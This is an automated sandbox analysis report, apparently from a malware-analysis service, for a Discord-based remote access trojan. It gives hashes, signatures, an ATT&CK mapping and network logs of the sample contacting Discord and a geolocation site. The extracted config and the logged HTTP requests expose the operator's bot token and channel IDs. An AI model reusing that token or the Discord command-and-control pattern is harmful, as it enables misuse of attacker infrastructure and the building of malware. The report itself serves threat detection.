discordrat | 08d4d8a882d74fa4d9525a5c78351bb3eba95f1c7d78f75c2f5d606715059e90

Resubmissions

01/12/2024, 22:55 UTC

241201-2wf4hawlgz 10

01/12/2024, 15:41 UTC

241201-s4269svncx 10

01/12/2024, 15:38 UTC

241201-s23p1szkbp 10

01/12/2024, 15:30 UTC

241201-sxv5dazjcl 10

Analysis

max time kernel
13s
max time network
19s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01/12/2024, 15:41 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.exe
Size

78KB
MD5

e8ff8d278de10cc2f7255b156ae2d252
SHA1

c91554ef849852360499b82579ca0c41c9dfde21
SHA256

08d4d8a882d74fa4d9525a5c78351bb3eba95f1c7d78f75c2f5d606715059e90
SHA512

c9eb226331c00b915c5ff5b2b407aa6f31536b671bff1cf11aa512d3cd4a60d0c9db14e5e4aee554e74259fcd755e9d835a960838d679e389943be0f20f65952
SSDEEP

1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+tPIC:5Zv5PDwbjNrmAE+9IC

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMxMjc5OTI3NDI3NDEyNzkyMg.GOuWiR.FNWWDzhiZI-BJlCUAsWOf3Q5avMNCiFtgUWBSQ
server_id
1307914676973076521

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	discord.com
20	discord.com
8	discord.com

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4224	Client-built.exe

C:\Users\Admin\AppData\Local\Temp\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224

Network

DNS

gateway.discord.gg

Client-built.exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.134.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.130.234
GET

https://gateway.discord.gg/?v=9&encording=json

Client-built.exe

Remote address:

162.159.135.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: R/zYzx+Le9CDa/edLHIKLA==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Sun, 01 Dec 2024 15:41:49 GMT
Connection: upgrade
sec-websocket-accept: cqFr0mIZR9JtfhXwGOSj4piZ4dg=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDnGlgcWrYDoonmQVsAhJV%2BlnHAuTxchjpy5OGu6xMiLlr0sj%2FBy4sm4r9J5CJgKAK6GZng8tLglNorHhz46TsFasmb%2F5pmtMA6WYq9W7huDhg2qELhHxM2iwWNxf6knzZKS5g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8eb42eff8ab09409-LHR
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

discord.com

Client-built.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/v9/guilds/1307914676973076521/channels

Client-built.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/guilds/1307914676973076521/channels HTTP/1.1
authorization: Bot MTMxMjc5OTI3NDI3NDEyNzkyMg.GOuWiR.FNWWDzhiZI-BJlCUAsWOf3Q5avMNCiFtgUWBSQ
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 30
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 201 Created

Date: Sun, 01 Dec 2024 15:41:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=c8266a92affa11ef89a7ba28d14de843; Expires=Fri, 30-Nov-2029 15:41:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1985
x-ratelimit-reset: 1733152895.617
x-ratelimit-reset-after: 85185.142
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jFhhLX2Rb3b3E1DpB%2BAX5sQ%2FcKM9yYj397CWdas%2BbZyNbcpd1G8O2Yuh0fmWGDKa4YgbzdomFZ4u5t5ZhZpPIPsXK%2FH9mM%2F6BmmSxECjlhb7xwnx7YBUkQM6PmT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c8266a92affa11ef89a7ba28d14de8437aaa5e0d0555ef86b339b8f42fd4cb2f594a1115c7383a64eda7898963b98e1f; Expires=Fri, 30-Nov-2029 15:41:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=0d424f1c2ddba7bf25ef6c5f5d62812deb2423db-1733067710; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=yf1VmHpBv49rIyhOFkVDu5g46yfav55rq0WuvBYCjnU-1733067710687-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8eb42f059b3b6371-LHR
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

234.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.135.159.162.in-addr.arpa

IN PTR

Response
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

geolocation-db.com

Client-built.exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A

Response

geolocation-db.com

IN A

159.89.102.253
GET

https://geolocation-db.com/json

Client-built.exe

Remote address:

159.89.102.253:443

Request

GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 01 Dec 2024 15:41:51 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
GET

https://geolocation-db.com/json/

Client-built.exe

Remote address:

159.89.102.253:443

Request

GET /json/ HTTP/1.1
Host: geolocation-db.com

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 01 Dec 2024 15:41:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
POST

https://discord.com/api/v9/channels/1312805871579041792/messages

Client-built.exe

Remote address:

162.159.136.232:443

Request

POST /api/v9/channels/1312805871579041792/messages HTTP/1.1
authorization: Bot MTMxMjc5OTI3NDI3NDEyNzkyMg.GOuWiR.FNWWDzhiZI-BJlCUAsWOf3Q5avMNCiFtgUWBSQ
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 117
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 01 Dec 2024 15:41:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=c89fb582affa11ef9a7daec9adc2bf28; Expires=Fri, 30-Nov-2029 15:41:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1733067712.382
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtAga492OOLJMWY2UlmetwLoI3O0YaiHkmFcxx9VjnS85XXsEZtnO8j73GM1T13J%2BVdLwLC9QEWRSKAhhku67XzWT4ePpNrWYKsWzSyw6rbDT5BeGKIfXUoEQojJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c89fb582affa11ef9a7daec9adc2bf28a4f7c854927a744598f3a3d8e81153703e459f0ad912798f503e8e88c4ce63cf; Expires=Fri, 30-Nov-2029 15:41:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c6f0d91d4a7504587f980766696d28521e7245b6-1733067711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=9eSJ_UjnFJHvjXr.XgFg.343_Kp6.jfChMrn2s9qJX0-1733067711482-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8eb42f0b58af773d-LHR
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

253.102.89.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.102.89.159.in-addr.arpa

IN PTR

Response

162.159.135.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

Client-built.exe

1.3kB
14.8kB
14
20

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
162.159.136.232:443

https://discord.com/api/v9/guilds/1307914676973076521/channels

tls, http

Client-built.exe

1.1kB
5.5kB
11
13

HTTP Request

POST https://discord.com/api/v9/guilds/1307914676973076521/channels

HTTP Response

201
159.89.102.253:443

https://geolocation-db.com/json/

tls, http

Client-built.exe

848 B
4.5kB
9
10

HTTP Request

GET https://geolocation-db.com/json

HTTP Response

301

HTTP Request

GET https://geolocation-db.com/json/

HTTP Response

200
162.159.136.232:443

https://discord.com/api/v9/channels/1312805871579041792/messages

tls, http

Client-built.exe

1.3kB
3.0kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1312805871579041792/messages

HTTP Response

200

8.8.8.8:53

gateway.discord.gg

dns

Client-built.exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.135.234

162.159.134.234

162.159.133.234

162.159.136.234

162.159.130.234
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

discord.com

dns

Client-built.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.128.233

162.159.138.232

162.159.137.232

162.159.135.232
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

234.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.135.159.162.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

geolocation-db.com

dns

Client-built.exe

64 B
80 B
1
1

DNS Request

geolocation-db.com

DNS Response

159.89.102.253
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

253.102.89.159.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

253.102.89.159.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4224-0-0x00007FFEC6C43000-0x00007FFEC6C45000-memory.dmp

Filesize
8KB

Download
memory/4224-1-0x0000013F54910000-0x0000013F54928000-memory.dmp

Filesize
96KB

Download
memory/4224-2-0x0000013F6EF20000-0x0000013F6F0E2000-memory.dmp

Filesize
1.8MB

Download
memory/4224-3-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

Filesize
10.8MB

Download
memory/4224-4-0x0000013F6F720000-0x0000013F6FC48000-memory.dmp

Filesize
5.2MB

Download
memory/4224-5-0x00007FFEC6C43000-0x00007FFEC6C45000-memory.dmp

Filesize
8KB

Download
memory/4224-6-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.